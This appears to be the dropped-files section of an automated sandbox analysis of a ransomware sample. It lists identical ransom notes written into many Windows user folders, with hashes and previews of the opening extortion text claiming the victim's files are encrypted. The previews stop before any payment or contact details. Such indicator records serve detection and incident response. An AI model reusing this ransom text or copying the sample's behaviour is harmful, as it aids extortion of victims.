          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Default\Videos\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Default\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Public\AccountPictures\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Public\Desktop\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Public\Documents\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Public\Downloads\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Public\Libraries\RecordedTV.library-ms
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1231
          Entropy (8bit):7.873250538556591
          Encrypted:false
          SSDEEP:24:T4L07UNggZdgkZGjqcFbJZk7LD1bfNk9Hv52cyKx5q9qs8QQCvREXADn+zRH:TBKdgMMqSWfNk9h+Kx09rpQCvuu+lH
          MD5:96ED0430ABF8E6751122961B0401B64B
          SHA1:DE9F5A5FE2A1972A1D51E517E8614FA85196EBA6
          SHA-256:4A75F7DF381486FF662C1B342E5E769729D103BC65EAF1E003261504C744DCCF
          SHA-512:CA964E5F77A6B776A9361FB61FD6540D0B8D417E7A4F805FEF5A5DA08EAFA1CDD8B9BE25A9E27F8E82A2AE4F8D53289D6F23D5E33A186B6A603A9599C7C51B1A
          Malicious:false
          Preview: ..[.?..Z..a.......j.KB[+...+..:f.J.5...MV...{...z..FMP`.R.Z<.T....'i...Q,..A..=(..@l..{5.NT.`.)).h...).u..$...$T.@...}b....:.Bc....,.>.B.E$...*.J........r..7`...(...P,>.X.+...w~5uY~.....o4_.....j......j...aC....dq.q../.QU.}...W....`.48+<.l...c.[...V.2.Z.c.o.E....j.dA.4,.&Sd*P.4y.. ...x.s.._...u...<P({..3.a.Qw[%.NB0.pC..}[.7.^9N%U.z....H....y.uo.W.$.E.p.a....H...w>.n_.t=~........B..%... ......j.}..Gf...._.A........U..<.9+......!h]..I...e...*..Jq!..l.B.v.O..O....(~Z@.#.L..!....U'...Zr.N.4nM..y"..&...s:M.GiN.<........`R......K.o..Y.....Z.8...A....1..2......%b..h.]..1o......W..K.p.r.1....t..x.....c.l.F.=.mp..5,".c>+..j9..~..!&..qhv.A.8.t..3.\...O. .&.E...D.eC..;.E...W9........p.....<.a......4.pV.}...g.&....\......*....].........q.....A^...1C...F.*....<~....L....<..=c....(]....{|. .KM.r....YL3/...;..B...Y=]n.S0...I.....R|....9&".........m..&78....+`.6.c.....:/}Z=.T....D...g.U....?s...R..8.z.L.5.Y...C#S.p.d..lN.i...I.>h.U./"..$......P.
          C:\Users\Public\Libraries\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Public\Music\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Public\Pictures\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Public\Videos\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. 